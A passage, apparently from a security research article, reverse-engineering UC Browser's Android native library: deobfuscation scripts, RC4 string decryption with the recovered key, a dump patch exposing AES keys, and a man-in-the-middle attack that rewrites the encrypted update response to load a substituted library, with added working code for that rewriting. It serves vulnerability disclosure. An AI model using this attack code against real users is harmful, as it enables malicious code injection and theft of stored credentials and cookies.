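        skip = (0xE000 | 2).to_bytes(2, "little")                      # B +4 over the literal
        return nop + ldr_lit + ldr_reg + skip
    if reg > 11:
        raise ValueError("the scripts only patch R0-R5 and R8-R11")
    ldr_lit = (0xF8DF).to_bytes(2, "little") + ((reg << 12) | 6).to_bytes(2, "little")   # LDR.W Rn, [PC, #6]
    ldr_reg = (0xF8D0 | reg).to_bytes(2, "little") + (reg << 12).to_bytes(2, "little")  # LDR.W Rn, [Rn]
    skip = (0xE000 | 1).to_bytes(2, "little")                                            # B +2
    return nop + ldr_lit + ldr_reg + skip


if __name__ == "__main__":
    # Addresses from the text: the pattern at 0xB26A resolves to a jump to 0xB4B0.
    code = encode_thumb_branch(0xB26A, 0xB4B0)
    print(code.hex(), hex(decode_thumb_branch(0xB26A, code)))
    print(thumb_patch_load_deref(0).hex(), thumb_patch_load_deref(8).hex())
```

Two details worth checking against the scripts: the `J1 = J2 = 1` choice in `0xB800` is what makes the plain two's-complement offset arithmetic of put_unconditional_branch() a valid T4 encoding for both directions, and the `ea % 4` step in the second script exists because the 16-bit `LDR Rn, [PC, #4]` reads its literal from a 4-byte-aligned PC.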

We put the cursor at the beginning of the construction we want to replace, 0xB4B2, and run the script:

[screenshot]

Besides the constructions already described, the code also contains the following:

[screenshot]

As in the previous case, an offset follows the BLX instruction:

[screenshot]

We take the offset at the address in LR, add it to LR, and jump there: 0x72044 + 0xC = 0x72050. The script for this pattern is quite simple:

    from idc import *   # IDAPython

    def put_unconditional_branch(source, destination):
        # Same encoder as in the first script: 16-bit B (T2) or 32-bit B.W (T4).
        offset = (destination - source - 4) >> 1
        if offset > 2097151 or offset < -2097152:
            raise RuntimeError("Invalid offset")
        if offset > 1023 or offset < -1024:
            instruction1 = 0xf000 | ((offset >> 11) & 0x7ff)
            instruction2 = 0xb800 | (offset & 0x7ff)
            patch_word(source, instruction1)
            patch_word(source + 2, instruction2)
        else:
            instruction = 0xe000 | (offset & 0x7ff)
            patch_word(source, instruction)

    ea = here()
    if get_wide_word(ea) == 0xb503:  # PUSH {R0,R1,LR}
        ea1 = ea + 6  # skip PUSH and the 4-byte BLX; ea1 now points at the offset dword (LR)
        if get_wide_word(ea + 2) == 0xbf00:  # NOP
            ea1 += 2
        offset = get_wide_dword(ea1)
        put_unconditional_branch(ea, (ea1 + offset) & 0xffffffff)
    else:
        print("Unable to detect first instruction")

The result of running the script:

[screenshot]

Once everything in a function has been patched, you can point IDA at its real beginning. It will assemble the whole function from the pieces, and the function can then be decompiled with HexRays.

Decrypting strings

We have learned how to deal with the machine code obfuscation in the libsgmainso-6.4.36.so library from UC Browser and obtained the code of the JNI_OnLoad function.

int __fastcall real_JNI_OnLoad(JavaVM *vm)
{
  int result; // r0
  jclass clazz; // r0 MAPDST
  int v4; // r0
  JNIEnv *env; // r4
  int v6; // [sp-40h] [bp-5Ch]
  int v7; // [sp+Ch] [bp-10h]

  v7 = *(_DWORD *)off_8AC00;
  if ( !vm )
    goto LABEL_39;
  sub_7C4F4();
  env = (JNIEnv *)sub_7C5B0(0);
  if ( !env )
    goto LABEL_39;
  v4 = sub_72CCC();
  sub_73634(v4);
  sub_73E24(&unk_83EA6, &v6, 49);
  clazz = (jclass)((int (__fastcall *)(JNIEnv *, int *))(*env)->FindClass)(env, &v6);
  if ( clazz
    && (sub_9EE4(),
        sub_71D68(env),
        sub_E7DC(env) >= 0
     && sub_69D68(env) >= 0
     && sub_197B4(env, clazz) >= 0
     && sub_E240(env, clazz) >= 0
     && sub_B8B0(env, clazz) >= 0
     && sub_5F0F4(env, clazz) >= 0
     && sub_70640(env, clazz) >= 0
     && sub_11F3C(env) >= 0
     && sub_21C3C(env, clazz) >= 0
     && sub_2148C(env, clazz) >= 0
     && sub_210E0(env, clazz) >= 0
     && sub_41B58(env, clazz) >= 0
     && sub_27920(env, clazz) >= 0
     && sub_293E8(env, clazz) >= 0
     && sub_208F4(env, clazz) >= 0) )
  {
    result = (sub_B7B0(env, clazz) >> 31) | 0x10004;
  }
  else
  {
LABEL_39:
    result = -1;
  }
  return result;
}

Let's take a closer look at these lines:

  sub_73E24(&unk_83EA6, &v6, 49);
  clazz = (jclass)((int (__fastcall *)(JNIEnv *, int *))(*env)->FindClass)(env, &v6);

The function sub_73E24 obviously decrypts the class name. Its parameters are a pointer to data that looks encrypted, a buffer, and a number. Clearly, after the call the buffer holds the decrypted string, since it is passed to FindClass, which takes the class name as its second parameter. So the number is the size of the buffer or the length of the string. Let's try to decrypt the class name; it should tell us whether we are heading in the right direction. Let's look more closely at what happens inside sub_73E24.

int __fastcall sub_73E56(unsigned __int8 *in, unsigned __int8 *out, size_t size)
{
  int v4; // r6
  int v7; // r11
  int v8; // r9
  int v9; // r4
  size_t v10; // r5
  int v11; // r0
  struc_1 v13; // [sp+0h] [bp-30h]
  int v14; // [sp+1Ch] [bp-14h]
  int v15; // [sp+20h] [bp-10h]

  v4 = 0;
  v15 = *(_DWORD *)off_8AC00;
  v14 = 0;
  v7 = sub_7AF78(17);
  v8 = sub_7AF78(size);
  if ( !v7 )
  {
    v9 = 0;
    goto LABEL_12;
  }
  (*(void (__fastcall **)(int, const char *, int))(v7 + 12))(v7, "DcO/lcK+h?m3c*q@", 16);
  if ( !v8 )
  {
LABEL_9:
    v4 = 0;
    goto LABEL_10;
  }
  v4 = 0;
  if ( !in )
  {
LABEL_10:
    v9 = 0;
    goto LABEL_11;
  }
  v9 = 0;
  if ( out )
  {
    memset(out, 0, size);
    v10 = size - 1;
    (*(void (__fastcall **)(int, unsigned __int8 *, size_t))(v8 + 12))(v8, in, v10);
    memset(&v13, 0, 0x14u);
    v13.field_4 = 3;
    v13.field_10 = v7;
    v13.field_14 = v8;
    v11 = sub_6115C(&v13, &v14);
    v9 = v11;
    if ( v11 )
    {
      if ( *(_DWORD *)(v11 + 4) == v10 )
      {
        qmemcpy(out, *(const void **)v11, v10);
        v4 = *(_DWORD *)(v9 + 4);
      }
      else
      {
        v4 = 0;
      }
      goto LABEL_11;
    }
    goto LABEL_9;
  }
LABEL_11:
  sub_7B148(v7);
LABEL_12:
  if ( v8 )
    sub_7B148(v8);
  if ( v9 )
    sub_7B148(v9);
  return v4;
}

The function sub_7AF78 creates an instance of a container for a byte array of the given size (we will not go into the details of these containers). Two such containers are created here: one holds the string "DcO/lcK+h?m3c*q@" (it is easy to guess that this is a key), the other holds the encrypted data. Both objects are then placed in a structure that is passed to sub_6115C. Also note the field in this structure that is set to 3. Let's see what happens with this structure next.

int __fastcall sub_611B4(struc_1 *a1, _DWORD *a2)
{
  int v3; // lr
  unsigned int v4; // r1
  int v5; // r0
  int v6; // r1
  int result; // r0
  int v8; // r0

  *a2 = 820000;
  if ( a1 )
  {
    v3 = a1->field_14;
    if ( v3 )
    {
      v4 = a1->field_4;
      if ( v4 < 0x19 )
      {
        switch ( v4 )
        {
          case 0u:
            v8 = sub_6419C(a1->field_0, a1->field_10, v3);
            goto LABEL_17;
          case 3u:
            v8 = sub_6364C(a1->field_0, a1->field_10, v3);
            goto LABEL_17;
          case 0x10u:
          case 0x11u:
          case 0x12u:
            v8 = sub_612F4(
                   a1->field_0,
                   v4,
                   *(_QWORD *)&a1->field_8,
                   *(_QWORD *)&a1->field_8 >> 32,
                   a1->field_10,
                   v3,
                   a2);
            goto LABEL_17;
          case 0x14u:
            v8 = sub_63A28(a1->field_0, v3);
            goto LABEL_17;
          case 0x15u:
            sub_61A60(a1->field_0, v3, a2);
            return result;
          case 0x16u:
            v8 = sub_62440(a1->field_14);
            goto LABEL_17;
          case 0x17u:
            v8 = sub_6226C(a1->field_10, v3);
            goto LABEL_17;
          case 0x18u:
            v8 = sub_63530(a1->field_14);
LABEL_17:
            v6 = 0;
            if ( v8 )
            {
              *a2 = 0;
              v6 = v8;
            }
            return v6;
          default:
            LOWORD(v5) = 28032;
            goto LABEL_5;
        }
      }
    }
  }
  LOWORD(v5) = -27504;
LABEL_5:
  HIWORD(v5) = 13;
  v6 = 0;
  *a2 = v5;
  return v6;
}

Earlier, the structure's switch field was set to 3. Look at case 3: function sub_6364C receives the parameters that were placed in the structure by the previous function, i.e. the key and the encrypted data. If you look closely at sub_6364C, you can recognise the RC4 algorithm in it.

We have the algorithm and the key. Let's try to decrypt the class name. Here is what we got: com/taobao/wireless/security/adapter/JNICLibrary. Excellent! We are on the right track.
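As an added illustration (not code from UC Browser or the original article), here is a plain RC4 implementation of the kind recognised in sub_6364C, driven with the key string found above. Go is used for the added examples on this page because its standard library also covers the AES and LEB128 steps that come later. The ciphertext bytes of the class name are not reproduced on the page, so the sample encrypts the class name under the key itself before decrypting it; a public RC4 test vector is the actual check that the implementation is right.

```go
package main

import (
	"encoding/hex"
	"fmt"
)

// Added example, not code from UC Browser or the article: a plain RC4 of the
// kind recognised in sub_6364C. KSA builds the permutation from the key, PRGA
// produces the keystream that is XORed over the input. RC4 is symmetric, so
// the same call both encrypts and decrypts.
func rc4(key, data []byte) []byte {
	if len(key) == 0 {
		return nil
	}
	var s [256]byte
	for i := range s {
		s[i] = byte(i)
	}
	// KSA: scramble the state array with the key bytes.
	j := 0
	for i := 0; i < 256; i++ {
		j = (j + int(s[i]) + int(key[i%len(key)])) & 0xff
		s[i], s[j] = s[j], s[i]
	}
	// PRGA: one keystream byte per input byte.
	out := make([]byte, len(data))
	x, y := 0, 0
	for k, b := range data {
		x = (x + 1) & 0xff
		y = (y + int(s[x])) & 0xff
		s[x], s[y] = s[y], s[x]
		out[k] = b ^ s[(int(s[x])+int(s[y]))&0xff]
	}
	return out
}

// The key string found next to the encrypted class name in sub_7AF78.
const ucKey = "DcO/lcK+h?m3c*q@"

// DecryptUCString applies the recovered key to a blob the same way the
// container pair is handed to case 3 of sub_611B4.
func DecryptUCString(ct []byte) string {
	return string(rc4([]byte(ucKey), ct))
}

func main() {
	// Constructed sample: the page does not reproduce the ciphertext bytes,
	// so the class name is encrypted here under the recovered key purely to
	// give the decryption step an input.
	ct := rc4([]byte(ucKey), []byte("com/taobao/wireless/security/adapter/JNICLibrary"))
	fmt.Println("ciphertext:", hex.EncodeToString(ct))
	fmt.Println("decrypted: ", DecryptUCString(ct))
}
```

Once the key and algorithm are confirmed this way, the same function can be pointed at every other string the library decrypts through the case-3 path.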

Command tree

Now we need to find the RegisterNatives call that will point us to the doCommandNative function. Let's look through the functions called from JNI_OnLoad and find it in sub_B7B0:

int __fastcall sub_B7F6(JNIEnv *env, jclass clazz)
{
char signature[41]; // [sp+7h] [bp-55h]
char name[16]; // [sp+30h] [bp-2Ch]
JNINativeMethod method; // [sp+40h] [bp-1Ch]
int v8; // [sp+4Ch] [bp-10h]
v8 = *(_DWORD *)off_8AC00;
decryptString((unsigned __int8 *)&unk_83ED9, (unsigned __int8 *)name, 0x10u);// doCommandNative
decryptString((unsigned __int8 *)&unk_83EEA, (unsigned __int8 *)signature, 0x29u);// (I[Ljava/lang/Object;)Ljava/lang/Object;
method.name = name;
method.signature = signature;
method.fnPtr = sub_B69C;
return ((int (__fastcall *)(JNIEnv *, jclass, JNINativeMethod *, int))(*env)->RegisterNatives)(env, clazz, &method, 1) >> 31;
}

And indeed, a native method named doCommandNative is registered here. Now we know its address. Let's see what it does.

int __fastcall doCommandNative(JNIEnv *env, jobject obj, int command, jarray args)
{
int v5; // r5
struc_2 *a5; // r6
int v9; // r1
int v11; // [sp+Ch] [bp-14h]
int v12; // [sp+10h] [bp-10h]
v5 = 0;
v12 = *(_DWORD *)off_8AC00;
v11 = 0;
a5 = (struc_2 *)malloc(0x14u);
if ( a5 )
{
a5->field_0 = 0;
a5->field_4 = 0;
a5->field_8 = 0;
a5->field_C = 0;
v9 = command % 10000 / 100;
a5->field_0 = command / 10000;
a5->field_4 = v9;
a5->field_8 = command % 100;
a5->field_C = env;
a5->field_10 = args;
v5 = sub_9D60(command / 10000, v9, command % 100, 1, (int)a5, &v11);
}
free(a5);
if ( !v5 && v11 )
sub_7CF34(env, v11, &byte_83ED7);
return v5;
}

From the name you can guess that this is the entry point to all the functions the developers chose to move into the native library. We are interested in function number 10601.

As you can see from the code, the command number yields three numbers: command / 10000, command % 10000 / 100 and command % 100, i.e. in our case 1, 6 and 1. These three numbers, together with a pointer to JNIEnv and the arguments passed to the function, are put into a structure and passed on. From the three numbers obtained (let's call them N1, N2 and N3) a command tree is built.

Something like this:

[image]

The tree is filled dynamically in JNI_OnLoad. The three numbers encode a path in the tree. Each leaf of the tree holds the obfuscated address of the corresponding function, and the key is stored in the parent node. Finding the place in the code where the function we need is added to the tree is not hard if you understand all the structures involved (we will not describe them, so as not to bloat an already long article).
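The dispatch just described, rebuilt as an added Go example (not UC Browser code): SplitCommand applies the same arithmetic as doCommandNative, and CommandTree stores each leaf address under its parent node's key. The XOR used to obfuscate the leaves and the key value are assumptions for illustration; the page only shows that the leaf is obfuscated and that the key lives in the parent node, not the real transform.

```go
package main

import "fmt"

// Added example, not UC Browser code: a reconstruction of the dispatch
// described above. doCommandNative splits the numeric command into three
// digits, which select a path through a three-level tree whose leaves hold an
// obfuscated function address and whose parent node holds the key. The XOR
// with the parent key is an assumption; the real transform is not on the page.

// SplitCommand mirrors the arithmetic in doCommandNative.
func SplitCommand(cmd int) (n1, n2, n3 int) {
	return cmd / 10000, cmd % 10000 / 100, cmd % 100
}

type level3 struct {
	key    uint32         // key stored in the parent node
	leaves map[int]uint32 // N3 -> obfuscated address
}

// CommandTree is N1 -> N2 -> node holding the N3 leaves.
type CommandTree map[int]map[int]*level3

// Register stores addr for cmd, obfuscated under the parent's key
// (the real tree is filled in JNI_OnLoad).
func (t CommandTree) Register(cmd int, key, addr uint32) {
	n1, n2, n3 := SplitCommand(cmd)
	if t[n1] == nil {
		t[n1] = map[int]*level3{}
	}
	node := t[n1][n2]
	if node == nil {
		node = &level3{key: key, leaves: map[int]uint32{}}
		t[n1][n2] = node
	}
	node.leaves[n3] = addr ^ node.key
}

// Lookup walks the path for cmd and de-obfuscates the leaf with the parent key.
func (t CommandTree) Lookup(cmd int) (uint32, bool) {
	n1, n2, n3 := SplitCommand(cmd)
	node, ok := t[n1][n2]
	if !ok {
		return 0, false
	}
	obf, ok := node.leaves[n3]
	if !ok {
		return 0, false
	}
	return obf ^ node.key, true
}

func main() {
	tree := CommandTree{}
	// 10601 is the command the article follows and 0x5F1AC the address it
	// resolves to on the page; the key value is made up for this example.
	tree.Register(10601, 0xDEADBEEF, 0x5F1AC)
	n1, n2, n3 := SplitCommand(10601)
	addr, _ := tree.Lookup(10601)
	fmt.Printf("10601 -> N1=%d N2=%d N3=%d -> 0x%X\n", n1, n2, n3, addr)
}
```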

More obfuscation

We found the address of the function that should decrypt the traffic: 0x5F1AC. But it is too early to celebrate: the UC Browser developers have prepared another surprise for us.

After obtaining the parameters from the array created in the Java code, we land in the function at address 0x4D070. And another kind of code obfuscation awaits us there.

We put two indices into R7 and R4:

[image]

We shift the first index into R11:

[image]

To get an address from the table, the index is used:

[image]

After the jump to the first address, the second index, which sits in R4, is used. The table has 230 elements.

What can be done about this? You can tell IDA that this is a switch: Edit -> Other -> Specify switch idiom.

[image]

The resulting code is frightening. But, hacking your way through its jungle, you can spot a call to a function we already know, sub_6115C:

[image]

It contained a switch in which, in case 3, decryption with the RC4 algorithm took place. In this case, the structure passed to the function is filled from the parameters passed to doCommandNative. Recall what we had there: magicInt with the value 16. Look at the corresponding case, and after several jumps we find the code by which the algorithm can be identified.

[image]

It's AES!

We have the algorithm; all that remains is to get its parameters: mode, key and, possibly, the initialization vector (whether there is one depends on the AES mode of operation). The structure holding them must be built somewhere before the call to sub_6115C, but this part of the code is especially heavily obfuscated, so the idea arose to patch the code so that all the parameters of the decryption function are dumped to a file.

Patch

To avoid writing the whole patch in assembly by hand, you can fire up Android Studio, write a function there that receives the same input parameters as our decryption function and writes them to a file, then copy and paste the code the compiler generates.

Our friends from the UC Browser team also took care to make adding code convenient. Recall that at the beginning of each function there is junk code that can easily be replaced with anything else. Very handy :) However, at the beginning of the target function there isn't enough room for code that saves all the parameters to a file. It had to be split into parts, using the junk blocks of neighbouring functions. Four parts in total.

Part one:

[image]

In the ARM architecture, the first four function arguments are passed in registers R0-R3; the rest, if any, go on the stack. The LR register holds the return address. All of this has to be saved so that the function still works after we dump its parameters. We also need to save every register we will use along the way, so we do PUSH.W {R0-R10,LR}. In R7 we get the address of the list of arguments that were passed to the function on the stack.

Using fopen we open the file /data/local/tmp/aes in "ab" mode, i.e. for appending. In R0 we load the address of the file name, in R1 the address of the string with the mode. And here the junk code ends, so we move on to the next function. To keep that function working, we place a jump to its real body at its start, skipping the junk, and in place of the junk we put the continuation of the patch.

[image]

Calling fopen.

The first three parameters of the aes function are of type int. Since we saved the registers on the stack at the start, we can simply pass the write function their addresses on the stack.

[image]

Next come three structures, each holding a data size and a pointer to the data, for the key, the initialization vector and the encrypted data.

[image]

Finally, we close the file, restore the registers and hand control to the real aes function.

We build an APK with the patched library, sign it, install it on the device/emulator and launch it. We see that our dump is created and a lot of data is written to it. The browser uses encryption for more than just traffic, and all of it goes through the function in question. But for some reason the data we need isn't there, and the request we need is not visible in the traffic. So as not to wait until UC Browser deigns to make that request, let's take the encrypted server response captured earlier and patch the application again: add decryption to onCreate of the main activity.

    # 0x62 = 98 bytes of captured, still-encrypted server response
    const/16 v1, 0x62
    new-array v1, v1, [B
    fill-array-data v1, :encrypted_data
    # 0x1f is the first argument to the decryption helper j(int, byte[])
    const/16 v0, 0x1f
    invoke-static {v0, v1}, Lcom/uc/browser/core/d/c/g;->j(I[B)[B
    move-result-object v1
    # log only the length of the result to confirm the call succeeded
    array-length v2, v1
    invoke-static {v2}, Ljava/lang/String;->valueOf(I)Ljava/lang/String;
    move-result-object v2
    const-string v0, "ololo"
    invoke-static {v0, v2}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I

Build, sign, install, launch. We get a NullPointerException because the method returned null.

On further study of the code, a function was found that decrypts some interesting strings: "META-INF/" and ".RSA". Apparently the application checks its own certificate. Or perhaps even derives keys from it. I really didn't want to dig into what happens with the certificate, so we will simply slip it the correct one. Let's patch the encrypted string so that instead of "META-INF/" we get "BLABLINF/", create a folder with that name in the APK and put the squirrel browser's own certificate in it.

Build, sign, install, launch. Bingo! We have the key!

MitM

We got a key, and an initialization vector identical to the key. Let's try to decrypt the server response in CBC mode.

[image]

We see the archive URL, something resembling an MD5, "extract_unzipsize" and a number. We check: the MD5 of the archive matches, and the size of the unpacked library matches. We try to patch this library and feed it to the browser. To show that our patched library has loaded, we will fire an Intent to create an SMS with the text "PWNED!". We substitute two responses from the server: puds.ucweb.com/upgrade/index.xhtml and the archive download. In the first we replace the MD5 (the size does not change after unpacking), in the second we serve the archive with the patched library.
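To make the MitM step concrete, here is an added Go example (not the article's or UC Browser's code) of the cryptographic shape recovered so far: AES-CBC with the IV equal to the key, decrypting the update response, replacing the md5 field with the digest of a substitute archive, and re-encrypting it for the browser. The 16-byte key, PKCS#7 padding and the ';'-separated response layout are constructed stand-ins; the page shows only the field names, not the exact format. RecoverKey is not a step from the article: it demonstrates why reusing the key as the IV is a weakness in its own right, using the standard CBC key-as-IV recovery against an oracle that returns raw decrypted blocks.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Added example, not code from UC Browser or the article: AES-CBC with the IV
// equal to the key, as recovered above, plus the MitM step of rewriting the
// archive MD5 inside the decrypted response. PKCS#7 padding, the key and the
// ';'-separated response layout are constructed assumptions.
var sampleKey = []byte("0123456789abcdef") // constructed AES-128 key, not the real one

func pkcs7Unpad(b []byte) ([]byte, error) {
	n := len(b) - 1
	if n < 0 || b[n] == 0 || int(b[n]) > aes.BlockSize || int(b[n]) > len(b) ||
		!bytes.Equal(b[len(b)-int(b[n]):], bytes.Repeat([]byte{b[n]}, int(b[n]))) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-int(b[n])], nil
}

// DecryptRaw is CBC with IV == key, padding left in place.
func DecryptRaw(key, ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext not block-aligned")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, key[:aes.BlockSize]).CryptBlocks(pt, ct)
	return pt, nil
}

func DecryptResponse(key, ct []byte) ([]byte, error) {
	pt, err := DecryptRaw(key, ct)
	if err != nil {
		return nil, err
	}
	return pkcs7Unpad(pt)
}

func EncryptResponse(key, pt []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	n := aes.BlockSize - len(pt)%aes.BlockSize
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(n)}, n)...)
	cipher.NewCBCEncrypter(block, key[:aes.BlockSize]).CryptBlocks(padded, padded)
	return padded, nil
}

// ArchiveMD5 is the digest the browser compares with the downloaded archive.
func ArchiveMD5(archive []byte) string {
	sum := md5.Sum(archive)
	return hex.EncodeToString(sum[:])
}

// RewriteResponse: decrypt, swap the "md5=" field for the attacker's archive digest, re-encrypt.
func RewriteResponse(key, ct, newArchive []byte) ([]byte, error) {
	pt, err := DecryptResponse(key, ct)
	if err != nil {
		return nil, err
	}
	fields := strings.Split(string(pt), ";")
	for i, f := range fields {
		if strings.HasPrefix(f, "md5=") {
			fields[i] = "md5=" + ArchiveMD5(newArchive)
		}
	}
	return EncryptResponse(key, []byte(strings.Join(fields, ";")))
}

// RecoverKey is not a step from the article but shows why IV == key is weak on
// its own: against an oracle returning raw CBC-decrypted bytes, the input
// C1 || 0^16 || C1 gives P1 = D(C1) xor K and P3 = D(C1), so K = P1 xor P3.
func RecoverKey(oracle func([]byte) []byte, c1 []byte) []byte {
	probe := append(append(append([]byte{}, c1...), make([]byte, aes.BlockSize)...), c1...)
	p := oracle(probe)
	k := make([]byte, aes.BlockSize)
	for i := range k {
		k[i] = p[i] ^ p[2*aes.BlockSize+i]
	}
	return k
}

func main() {
	ct, _ := EncryptResponse(sampleKey, []byte("url=http://puds.example/lib.zip;md5="+ArchiveMD5([]byte("legit"))+";extract_unzipsize=4096")) // constructed
	patched, _ := RewriteResponse(sampleKey, ct, []byte("PWNED library"))
	pt, _ := DecryptResponse(sampleKey, patched)
	fmt.Println(string(pt)) // md5 field now matches the attacker's archive
}
```

The key-as-IV recovery applies wherever an attacker can observe raw CBC output for chosen input, so the scheme is weak independently of the dump-and-patch work that exposed the key here.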

The browser tries to download the archive several times and then reports an error. Apparently something doesn't suit it. Studying this murky format revealed that the server also sends the archive size:

[image]

It is encoded in LEB128. After the patch, the size of the archive with the library changed slightly, so the browser decided the archive had been downloaded corrupted, and after several attempts reported an error.

We adjust the archive size... and then, victory! :) The result is in the video.

https://www.youtube.com/watch?v=Nfns7uH03J8
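The size field the browser checks, as an added Go example (not the article's code): a hand-written unsigned LEB128 encoder and decoder, with encoding/binary's Uvarint called in main only to confirm it is the same encoding, and a PatchArchiveSize helper that rewrites the size for a resized archive. The record layout, a LEB128 size followed by the rest of the record, is a constructed stand-in; the page shows only that the size is LEB128-encoded.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// Added example, not code from UC Browser or the article: unsigned LEB128 as
// used for the archive size in the update response, and the patch step of
// replacing that size after the library has been modified. The record layout
// (LEB128 size followed by the rest of the record) is a constructed stand-in.

// EncodeLEB128 emits 7 bits per byte, low group first, MSB set while more follow.
func EncodeLEB128(v uint64) []byte {
	var out []byte
	for {
		b := byte(v & 0x7f)
		v >>= 7
		if v != 0 {
			b |= 0x80
		}
		out = append(out, b)
		if v == 0 {
			return out
		}
	}
}

// DecodeLEB128 returns the value and the number of bytes consumed. It rejects
// a truncated encoding and one longer than 64 bits, which an attacker-controlled
// response could otherwise feed to a naive parser.
func DecodeLEB128(b []byte) (uint64, int, error) {
	var v uint64
	for i, c := range b {
		if i == 10 {
			return 0, 0, errors.New("LEB128 overflow")
		}
		v |= uint64(c&0x7f) << (7 * uint(i))
		if c&0x80 == 0 {
			return v, i + 1, nil
		}
	}
	return 0, 0, errors.New("truncated LEB128")
}

// PatchArchiveSize rewrites the size field at the front of rec for a resized
// archive. The encoded length may change (127 -> 128 grows from 1 to 2 bytes),
// so the tail is re-appended rather than overwritten in place.
func PatchArchiveSize(rec []byte, newSize uint64) ([]byte, error) {
	_, n, err := DecodeLEB128(rec)
	if err != nil {
		return nil, err
	}
	return append(EncodeLEB128(newSize), rec[n:]...), nil
}

func main() {
	// Constructed record: original archive of 300 bytes, followed by a stub tail.
	rec := append(EncodeLEB128(300), []byte("...rest of record...")...)
	patched, _ := PatchArchiveSize(rec, 70000)
	size, _, _ := DecodeLEB128(patched)
	cross, _ := binary.Uvarint(patched) // encoding/binary's Uvarint is the same encoding
	fmt.Printf("old=% x -> new=% x, size=%d (Uvarint agrees: %d)\n", rec[:2], patched[:3], size, cross)
}
```

If the patched library comes out larger, the encoded size may need one more byte, which is why the field is rebuilt instead of patched in place.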

Results and the developers' reaction

In the same way, attackers could use UC Browser's insecure update mechanism to distribute and execute malicious libraries. These libraries would run in the browser's context, so they would receive all of its permissions. The result: the ability to display phishing windows, as well as access to the working files of the orange Chinese squirrel, including the logins, passwords and cookies stored in its database.

We contacted the UC Browser developers and informed them of the problem we had found, tried to point out the vulnerability and its danger, but they did not discuss anything with us. Meanwhile the browser continued to flaunt its dangerous feature in plain view. But once we disclosed the details of the problem, it could no longer be ignored as before. On March 27 a new version of UC Browser, 12.10.9.1193, was released in which the server is contacted over HTTPS: puds.ucweb.com/upgrade/index.xhtml. Note that moving the request to HTTPS only closes the on-path substitution; it does not change the fact that the browser still downloads and executes native code from that server.

Moreover, after the "fix" and up to the time of writing, trying to open a PDF in the browser ended with an error message reading "Oops, something went wrong!". No request to the server was made when trying to open a PDF, but a request was made at browser startup, which hints that the ability to download executable code in violation of Google Play rules remains.

Source: www.habr.com
